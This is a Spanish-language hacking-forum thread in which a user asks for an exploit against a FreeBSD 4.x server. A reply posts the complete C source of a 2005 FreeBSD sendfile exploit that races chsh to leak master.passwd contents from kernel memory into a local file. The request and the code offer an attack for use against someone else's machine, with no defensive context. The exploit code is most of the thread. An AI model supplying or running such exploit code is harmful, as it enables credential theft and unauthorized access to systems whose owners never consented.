Resultados 1 al 3 de 3

Exploit para el SO FreeBSD 4.4?

  1. #1 Exploit para el SO FreeBSD 4.4? 
    Iniciado
    Fecha de ingreso
    Jan 2006
    Mensajes
    10
    Descargas
    0
    Uploads
    0
    Existe algun exploit para el FreeBsd 4.3 prerelease 4.4??? Solo tiene el servicio http (puerto 80) activo.. Aguna Ayudita??
    Citar  
     

  2. #2  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.773
    Descargas
    31
    Uploads
    8
    Citar  
     

  3. #3 FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit 
    Avanzado
    Fecha de ingreso
    Jan 2004
    Ubicación
    NULL
    Mensajes
    901
    Descargas
    0
    Uploads
    0
    Código:
    /*
    ** FreeBSD master.passwd disclosure exploit
    ** by kcope in 2005, kingcope[at]gmx.net
    ** thanks to revoguard
    ** just compile and execute .. look into the kmem file
    ** it contains the master.passwd
    ** tested on unpatched FreeBSD 4.11-RELEASE
    ** advisory: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:02.sendfile.a
    sc
    ** +++KEEP PRIV8+++
    */
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/uio.h>
    #include <sys/stat.h>
    #include <stdio.h>
    #include <fcntl.h>
    #include <netinet/in.h>
    
    #define BUF_SIZ 4096
    
    void dolisten() {
    int s,c;
    struct sockaddr_in addr;
    struct sockaddr_in cli;
    socklen_t cli_size;
    char buf[BUF_SIZ];
    FILE *f=fopen("kmem", "w");
    
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(31337);
    addr.sin_family = AF_INET;
    
    s = socket(PF_INET, SOCK_STREAM, 0);
    if (bind(s, (struct sockaddr*) &addr, sizeof(addr)) == -1)
    {
    perror("bind() failed");
    exit(1);
    }
    
    listen(s, 3);
    
    c = accept(s, (struct sockaddr*) &cli, &cli_size);
    
    while (recv(c, buf, sizeof(buf) - 1, 0) > 0) {
    fwrite(buf, sizeof(buf), 1, f);
    }
    
    }
    
    int main() {
    int input_fd,fd,s,k;
    struct stat file_info;
    off_t offset = 0;
    FILE *f;
    int i=0;
    struct sockaddr_in addr;
    char st[]="A";
    
    f=fopen("sendfile1", "w");
    for (i=0; i!=64000000; i++) {
    fwrite(st, 1, 1, f);
    }
    fclose(f);
    
    input_fd = open ("sendfile1", O_RDWR);
    fstat (input_fd, &file_info);
    
    if (fork() != 0) {
    sleep(2);
    s = socket(PF_INET, SOCK_STREAM, 0);
    
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(31337);
    addr.sin_family = AF_INET;
    
    if (connect(s, (struct sockaddr*) &addr, sizeof(addr)) == -1)
    {
    perror("connect() failed");
    return 2;
    }
    
    if (fork() != 0) {
    if (sendfile (input_fd, s, offset, 64000000, NULL, NULL, 0) == -1) {
    perror("sendfile()");
    return -1;
    }
    } else {
    f=fopen("sendfile1", "w");
    fclose(f);
    for (k=0;k!=10;k++)
    system("/usr/bin/chsh -s /bin/sh");
    wait();
    }
    } else {
    dolisten();
    wait();
    }
    return 0;
    }
    • First they ignore you...
    Citar  
     

Temas similares

  1. Version para linux de exploit
    Por elusuario en el foro INTRUSION
    Respuestas: 1
    Último mensaje: 04-04-2010, 10:22
  2. Exploit Zero-Day para Internet Explorer
    Por LUK en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 11-12-2008, 16:13
  3. Exploit activo para vulnerabilidad de Word
    Por 4v7n42 en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 18-02-2007, 22:35
  4. hola ayuda para dso exploit
    Por ivanpc1 en el foro GENERAL
    Respuestas: 0
    Último mensaje: 24-11-2004, 20:16
  5. Exploit para múltiples dispositivos de red Cisco
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 31-03-2004, 16:07

Marcadores

Marcadores